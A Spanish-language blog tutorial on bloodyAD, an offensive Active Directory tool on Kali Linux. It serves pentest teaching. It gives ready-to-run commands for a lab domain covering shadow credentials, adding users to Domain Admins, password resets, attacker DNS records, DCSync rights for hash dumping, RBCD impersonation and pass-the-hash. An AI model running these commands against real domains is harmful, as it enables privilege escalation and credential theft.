Pentesting kali linux bloodyad

 

 https://www.onlinetis.com

Pentesting kali linux bloodyad

BloodyAD es una herramienta avanzada de administración de Active Directory (AD) diseñada para operar principalmente a través de protocolos como LDAP/LDAPS. Es especialmente útil en entornos de Kali Linux para tareas de pentesting, ya que permite realizar ataques de escalada de privilegios y manipulación de objetos de AD de forma directa.

Aquí tienes una guía rápida sobre cómo instalarla y utilizarla.


1. Instalación en Kali Linux

La forma más sencilla de instalar bloodyAD es a través de pip, utilizando un entorno virtual para evitar conflictos con las librerías del sistema.

Bash
# Crear un entorno virtual
python3 -m venv bloody-env
source bloody-env/bin/activate

# Instalar bloodyAD
pip install bloodyAD

2. Sintaxis Básica

La estructura del comando siempre requiere las credenciales del usuario y el controlador de dominio (DC).

Bash
bloodyAD --host <IP_DEL_DC> -d <dominio> -u <usuario> -p <password> <módulo> <comando> [opciones]

3. Casos de Uso Comunes

A. Enumeración de Usuarios

Si quieres obtener información detallada de un usuario específico:

Bash
bloodyAD --host 10.10.10.10 -d lab.local -u pentester -p Pass123 get object "CN=pablo,CN=Users,DC=lab,DC=local"

B. Ataque de "Shadow Credentials"

Esta es una de las funciones más potentes de la herramienta. Permite añadir un atributo msDS-KeyCredentialLink a un objeto para tomar control de él sin cambiar su contraseña.

  • Para leer el certificado y obtener el hash NT:

Bash
bloodyAD --host 10.10.10.10 -d lab.local -u user1 -p Pass123 add shadowCredentials "nombre_maquina$"

C. Manipulación de Membresía de Grupos

Si tienes permisos suficientes, puedes añadir un usuario a un grupo privilegiado (como "Domain Admins"):

Bash
bloodyAD --host 10.10.10.10 -d lab.local -u admin -p Pass123 add groupMember "CN=Domain Admins,CN=Users,DC=lab,DC=local" "CN=mi_usuario,CN=Users,DC=lab,DC=local"

D. Establecer una nueva contraseña

Útil cuando ya has escalado privilegios y necesitas resetear la cuenta de un objetivo:

Bash
bloodyAD --host 10.10.10.10 -d lab.local -u admin -p Pass123 set password "CN=objetivo,CN=Users,DC=lab,DC=local" "NuevaPassword123!"

¿Por qué usar BloodyAD en lugar de otras herramientas?

  1. Sin dependencias pesadas: No requiere una infraestructura compleja como BloodHound para ejecutar cambios rápidos.

  2. Basado en LDAP: Es más silencioso que usar herramientas basadas en RPC/SMB en ciertos contextos.

  3. Versatilidad: Soporta autenticación mediante contraseñas, hashes (Pass-the-Hash) y tickets de Kerberos.


Vamos a profundizar en los ataques más avanzados. BloodyAD es excepcional para esto porque puede automatizar procesos que antes requerían múltiples herramientas.

Aquí tienes cómo ejecutar los ataques de escalada de privilegios más comunes:


1. Ataque de Delegación de DNS (Escalada a SYSTEM)

Si tienes permisos para crear registros DNS (un usuario común suele tenerlo), puedes redirigir el tráfico hacia tu máquina atacante para capturar hashes o realizar relevos (Relay).

Bash
# Crear un registro DNS que apunte a tu IP de Kali
bloodyAD --host 10.10.10.10 -d lab.local -u user1 -p 'Pass123' add dnsRecord "KALI-PENTEST" "10.10.10.50"

2. Abuso de GenericAll o WriteDACL (DCSync)

Si BloodHound te indica que tienes permisos de GenericAll o WriteDACL sobre el objeto del Dominio, puedes otorgarte privilegios de replicación para hacer un DCSync y extraer todos los hashes del AD.

Bash
# Otorgar permisos de DCSync a tu propio usuario
bloodyAD --host 10.10.10.10 -d lab.local -u user_con_permisos -p 'Pass123' set dcsync "CN=mi_usuario,CN=Users,DC=lab,DC=local"

Después de esto, podrías usar secretsdump.py de Impacket para volcar los hashes NTDS.dit.


3. Delegación Basada en Recursos (RBCD)

Este es uno de los ataques más efectivos si tienes permisos de escritura sobre una cuenta de computadora. Permite que una computadora que tú controlas se haga pasar por cualquier usuario (incluso Administrador) ante la computadora objetivo.

Paso 1: Crear una cuenta de computadora falsa (o usar una que controles)

Bash
bloodyAD --host 10.10.10.10 -d lab.local -u user1 -p 'Pass123' add computer "ATTACK_PC$" "Password123!"

Paso 2: Configurar la delegación (RBCD)

Bash
bloodyAD --host 10.10.10.10 -d lab.local -u user1 -p 'Pass123' set rbcd "CN=SERVIDOR_OBJETIVO,CN=Computers,DC=lab,DC=local" "ATTACK_PC$"

4. Ataque de Shadow Credentials (Alternativa a RBCD)

Si el nivel funcional del dominio es Windows Server 2016 o superior, este es el método más "limpio" porque no cambia la contraseña del objetivo, solo añade una llave pública a su atributo msDS-KeyCredentialLink.

Bash
# Generar el certificado y la llave para impersonar a una máquina o usuario
bloodyAD --host 10.10.10.10 -d lab.local -u user1 -p 'Pass123' add shadowCredentials "CN=Victima,CN=Users,DC=lab,DC=local" --out-cert "victima.pfx"

Esto te devolverá un certificado. Luego usas ese certificado con PKINIT para obtener un TGT y, finalmente, el hash NT.


Resumen de Flags útiles

FlagDescripción
--hashesPara usar Pass-the-Hash: aad3...:582e...
-kUsar autenticación Kerberos (requiere KRB5CCNAME)
--secureForzar conexión por LDAPS (Puerto 636)

 

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Hacking y ciberseguridad en kali linux con atk6-thcping6

Como utilizar Fierce en kali linux